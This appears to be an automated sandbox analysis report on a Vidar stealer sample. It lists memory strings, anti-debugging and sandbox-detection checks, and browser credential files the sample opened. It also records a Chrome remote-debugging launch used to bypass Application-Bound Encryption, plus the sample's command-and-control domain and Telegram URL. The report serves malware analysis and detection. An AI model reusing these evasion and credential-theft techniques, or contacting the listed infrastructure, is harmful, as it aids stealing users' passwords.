Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000000C.00000003.2433036035.00000249D9BB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flus
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor9
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000000C.00000003.2430674176.00000249D9C01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Sched
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6769000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D6769000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V hjyxccxlsbpgevf Bus
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V hjyxccxlsbpgevf Bus Pipes
Source: chrome.exe, 0000000C.00000003.2389764630.00003CCC00314000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processor]
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D669B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition\|xG.
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus PipesJ
Source: chrome.exe, 0000000C.00000003.2430624506.00000249D9C13000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sWDHyper-V Hypervisor Root Partitions
Source: chrome.exe, 0000000C.00000002.2540680415.00000249D29DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processor.sys
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000000C.00000003.2433658544.00000249D9C10000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434128229.00000249D9C13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Teredo Router Solicitation3218Out - Teredo Bubble3220Out - Teredo Data3222In - Teredo Data User Mode3224In - Teredo Data Kernel Mode3226Out - Teredo Data User Mode3228Out - Teredo Data Kernel Mode6468Hyper-V Dynamic Memory Integration Service6470Maximum Memory, Mbytes1848Bluetooth Radio1850Classic ACL bytes written/sec1852LE ACL bytes written/sec1854SCO bytes written/sec1856Classic ACL bytes read/sec1858LE ACL bytes read/sec1860SCO bytes read/sec1862Classic ACL Connections1864LE ACL Connections1866SCO Connections1868Sideband SCO Connections1870ACL flush events/sec1872LE ACL write credits1874Classic ACL write credits1876LE Scan Duty Cycle (%) - Uncoded 1M Phy1878LE Scan Window - Uncoded 1M Phy1880LE Scan Interval - Uncoded 1M Phy1882Page Scan Duty Cycle (%)1884Page Scan Window1886Page Scan Interval1888Inquiry Scan Duty Cycle (%)1890Inquiry Scan Window1892Inquiry Scan Interval1894LE Scan Duty Cycle (%) - Coded Phy1896LE Scan Window - Coded Phy1898LE Scan Interval - Coded Phy1900Bluetooth Device1902Classic ACL bytes written/sec1904LE ACL bytes written/sec1906SCO bytes written/sec1908Classic ACL bytes read/sec1910LE ACL bytes read/sec1912SCO bytes read/sec3814ServiceModelService 4.0.0.03816Calls
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Logical Processormui
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor[\|f.
Source: chrome.exe, 0000000C.00000003.2433036035.00000249D9BC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Inte
Source: chrome.exe, 0000000C.00000003.2433658544.00000249D9BE2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436019975.00000249D9C03000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433658544.00000249D9C05000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436263825.00000249D9BF2000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2435809667.00000249D9BE9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2436019975.00000249D9BF9000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9BB9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: chrome.exe, 0000000C.00000003.2432227323.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434425374.00000249D6721000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2430756068.00000249D6721000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceI
Source: chrome.exe, 0000000C.00000002.2646823383.00000249D66F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Virtual Processor?}
Source: chrome.exe, 0000000C.00000003.2434955646.00000249D9BBD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Con
Source: chrome.exe, 0000000C.00000002.2649650384.00000249D9B38000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B4E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2431385780.00000249D9B4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: chrome.exe, 0000000C.00000003.2431385780.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.2649650384.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2434796883.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.2433036035.00000249D9B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2Hyper-V VM Vid Partition

Source: C:\Users\user\Desktop\random(2).exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random(2).exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random(2).exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\random(2).exe	File opened: NTICE
Source: C:\Users\user\Desktop\random(2).exe	File opened: SICE
Source: C:\Users\user\Desktop\random(2).exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random(2).exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\random(2).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\random(2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match

File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\random(2).exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1130116827.0000000000B79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1152734556.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1171301147.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: random(2).exe PID: 6980, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Masquerading	1 OS Credential Dumping	631 Security Software Discovery	Remote Services	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Extra Window Memory Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
random(2).exe	50%	Virustotal		Browse
random(2).exe	59%	ReversingLabs	Win32.Trojan.Vidar
random(2).exe	100%	Avira	TR/Crypt.TPM.Gen

Source	Detection	Scanner	Label	Link
https://ssl.google.cmanager.com	0%	Avira URL Cloud	safe
https://www.google.comAccess-Control-Allow-Credentials:	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
y.p.formaxprime.co.uk	78.47.63.132	true	true	unknown
t.me	149.154.167.99	true	false	high
www.google.com	142.250.186.164	true	false	high

Contacted URLs

Name	Malicious	Reputation
https://t.me/g_etcontent	false	high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE	false	high
https://www.google.com/async/newtab_promos	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://google.com/	chrome.exe, 0000000C.00000002.5817119523.00003CCC000A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/g_etcontentdqu220Mozilla/5.0	random(2).exe, 00000000.00000003.1061579899.00000000047F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goto.google.com/sme-bugs2e	chrome.exe, 0000000C.00000003.2375705245.00003CC800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.5727830719.00003CC80073C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 0000000C.00000002.6598026417.00003CCC00550000.00000004.00000800.00020000.00000000.sdmp	false		high
